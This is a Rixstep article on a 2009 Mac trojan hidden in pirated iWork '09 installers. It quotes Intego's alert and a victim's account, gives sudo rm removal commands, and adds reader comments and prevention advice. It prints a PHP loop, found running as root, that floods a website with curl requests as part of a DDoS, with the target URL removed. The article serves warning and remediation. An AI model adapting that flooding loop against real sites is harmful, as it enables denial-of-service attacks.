Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Home » Industry Watch

These Are Not the Trojans You're Looking For

Trojan masquerades as pirated iWork. CLIX command file for removing it.


Get It

Try It

Social engineering is great: tantalise with something for free. Watch them stand in line.

It's one thing to say that you're an idiot for obtaining software from untrusted sources, especially over P2P. But it's another to be in total denial that Macs are 'immune' to malware.

Once you furnish your password, anything goes. Be it Mac OS X, Ubuntu, or any other flavor of *nix.

There's an iWork '09 torrent out there. It has everything. But it also has a surprise: it installs an extra package called iWorkServices.

This is eminently easy to do because iWork uses Apple's Installer.app. And that app is script driven. So all the meanie had to do was put a few extra things in the package. In this case the trojan iWorkServices.pkg.

Although it's perfectly possible - and recommended - to perform a complete inspection of install packages before deciding to accept the software few people bother.

Those who've been victimised by this prank (more than 20,000 so far) find the following on their systems.

/private/tmp/.iWorkServices
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices

Two of the above locations are extremely proprietary. As in 'nobody can get in here'. So how did they get in? Easy.

The fools gave their passwords away.

iWorkServices

The item in /System/Library/StartupItems simply makes sure the item in /usr/bin is running. As root of course. No further authentication is necessary as startup items preclude a user account and always run as root SUM ('single user mode').

The trojan attempts to connect to a remote server. At that point anything is fair game. Intego claim the infected Apple systems are participating in DDoS attacks. So do others who have substantial proof. See below.

Intego Alert

From 22 January.

Exploit: OSX.Trojan.iServices.A Trojan Horse
Discovered: January 21, 2009
Risk: Serious

Description: Intego has discovered a new Trojan horse, OSX.Trojan.iServices.A, which is currently circulating in copies of Apple's iWork 09 found on BitTorrent trackers and other sites containing links to pirated software. The version of iWork 09, Apple's productivity suite, are complete and functional, but the installer contains an additional package called iWorkServices.pkg.



When installing iWork 09, the iWorkServices package is installed. The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password (in older versions of Mac OS X, 10.5.1 or earlier, there will be no password request). This software is installed as a startup item (in /System/Library/StartupItems/iWorkServices, a location reserved normally for Apple startup items), where it has read-write-execute permissions for root. The malicious software connects to a remote server over the Internet; this means that a malicious user will be alerted that this Trojan horse is installed on different Macs, and will have the ability to connect to them and perform various actions remotely. The Trojan horse may also download additional components to an infected Mac.

Intego is issuing this alert to warn Mac users not to download iWork 09 installers from sites offering pirated software. (As of 6 am EST, at least 20,000 people have downloaded this installer.) The risk of infection is serious, and users may face extremely serious consequences if their Macs are accessible to malicious users.

Pete Yandell

Pete Yandell down under discovered the trojan almost a week ago.

This morning I found a bunch of these processes chewing 100% CPU on my laptop (OS X 10.5.6):

php -r while(1){
  $mh = curl_multi_init(); $ch = array();
  for($i = 0; $i < 100; $i++){
    ^I$ch[$i] = curl_init(); ^Icurl_setopt($ch[$i], CURLOPT_URL, "http://...");
    ^Icurl_setopt($ch[$i], CURLOPT_HEADER, 0);
    ^Icurl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
    ^Icurl_multi_add_handle($mh, $ch[$i]);
  }
  do{ ^Icurl_multi_exec($mh, $running); }
  while($running > 0);
  for($i = 0; $i < 100; $i++){ ^Icurl_multi_remove_handle($mh, $ch[$i]); }
  curl_multi_close($mh);
}
That's a PHP script, running as root, and DoSing a website. (I've taken out the website URL, but it is one that has recently been under a documented DDoS attack.)

I'm still trying to work out how these got fired up.

He soon found out.

'My copy of the iWork 09 trial installer contained a trojan.'

Yandell got his copy 'through multiple hands'; he knows he was dumb.

AV Doesn't Help - Brains Do

Pete Yandell adds a few cogent remarks a week later.

'The companies that make Mac virus protection software are having fun with this of course but I still don't think virus protection software is needed on a Mac. My trojan didn't get in through an email or a malicious web page; it got in through my stupidity.'

Read that again. This exploit is extremely dangerous. But it's not a security hole in the system. The 20,000+ compromised Apple systems represent 20,000+ fools and no more. Antivirus does not help. Not. One. Bit.

The MacRumors 'Fix'

MacRumors report that despite the widespread alert people are still downloading the trojan.

'Despite significant publicity surrounding this incident today the infected iWork package remains active in the torrent community.'

MacRumors go on to state that the continued threat prompts them to move their report from the 'back page' area of the site to the front page. As if this wasn't major news otherwise.

Following is the MacRumors 'fix' - but don't run it as is.

1) (open Terminal.app)
2) sudo su (enter password)
3) rm -r /System/Library/StartupItems/iWorkServices
4) rm /private/tmp/.iWorkServices
5) rm /usr/bin/iWorkServices
6) rm -r /Library/Receipts/iWorkServices.pkg
7) killall -9 iWorkServices

A far safer way to go about this follows. Note 2) is wrapped for display.

1) (open Terminal.app)
2) sudo rm -fr /Library/Receipts/iWorkServices.pkg /private/tmp/.iWorkServices
/System/Library/StartupItems/iWorkServices /usr/bin/iWorkServices
3) killall -9 iWorkServices

You can also download the CLIX command here - then all you do is double click and run.

MacRumors Comments

This is always the most fun part. First the platform is impervious to any and all threats. Then everybody in the world is evil - and that includes the messengers who try to get these people to get a clue.

Trojan, not virus.

Ha ha. Serves them right the suckers!

Consider yourself to be highly lucky that you have no idea what a virus actually is.

It just goes to show that even if you have a Mac, just use a little common sense and you'll be fine.

Illegal software carries a trojan? As Justin Trousersnake once sang: 'Cry Me A River'.

********. I dl and installed iWorks, so did 4 people I know, none of us has this freakin' thing installed. Intego is at it again with imaginary threats

Why would anyone dl the torrent when you can get the full version minus serial code from apple?

-1 for the pirates.

**** happens....

Haha. I have no sympathy. It actually kind of made me smile....

Not the same as an actual virus for OS X.

What I don't get is why people just don't download the trial and enter in the serial......

I don't get why people don't pay the lousy $80 for it. I mean it's not expensive as far as software is concerned. Or better yet why they don't just download an open source office suite like open office. I have been using Neo-Office for years now and can't figure why I would need to buy or steal a productivity suite.

Once you put in your admin password during installation almost anything is possible. It could install an executable that would be run by root for example and disable LittleSnitch.

You can download a trial from Apple and find the serial on the web. There's no actual program (as far as I know) that you need to crack the program.

This is why you get the direct download from Apple, and then hunt for a serial... If you're in to the whole stealing copyrighted software thing. This just proves that people are idiots for downloading stuff from torrent sites, my hypothesis is proven.

I bet that half the people saying 'get what they deserve' are currently downloading virus removal software to check their torrent!

I have nothing to worry about :) But just curious, what's a virus, and what is a trojan? (coming from a Mac user, LOL)

And to those who bought pirate copies..... you asked for it...

You know, even when you have a Mac and you think you can beat the world wide web with it because you think you will stay virus free - you still got to be careful. Whoever is downloading the torrent should be pretty dumb.

The Little Snitch 'Fix'

Pete Yandell feels better now. This sort of thing isn't going to happen to him again.

'I am, however, now running Little Snitch, which at least would have let me know a bit earlier that I had a problem. It's a bit intrusive, so I'm not sure if I'll have the patience to keep using it.'

But Little Snitch isn't the solution. Listen to AlphaMack instead.

'Considering that the word on the street is that this trojan installs a backdoor and downloads additional software, who knows what other buggers lurk deep within the rabbit hole once the obvious intruder is gone.'

In other words: because you weren't careful and didn't inspect the package beforehand and because you didn't track what the installer did anything can happen. You left your system wide open to the 'guests'.

The 'Fix'

The 'real' fix involves the future - or if you're adventurous a new test right now.

  • Don't pirate software, especially over P2P. Take software only from trusted sources. This deliberately sounds like the Apple mantra of being careful with 'unknown and untrusted' titles.
  • It's not just about trust. It's about knowing even what non-malevolent packages are going to do.
  • If an installer asks for your password then be sure it gives you a good reason. Do not give away your password to strangers.
  • Run checks on the package. Installer packages can be opened with Pacifist. Binaries can be inspected with Xstrings. Installers can be fully tracked with Tracker to see exactly what they're up to.
  • The above should always be performed even with titles you're more inclined to trust. Such precautions take very little time or effort.

Remember: even an IBM supercomputer at Los Alamos can be hacked - if the person with the keys opens the front door wide.

This wasn't an exploit - it was 20,000+ fools getting fooled.

 - AlphaMack & Mac Skywatcher

See Also
Security Fix: Pirated iWork Software Infects Macs with Trojan Horse
Mack Diesel's Musings: These Are Not the Trojans You're Looking For

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.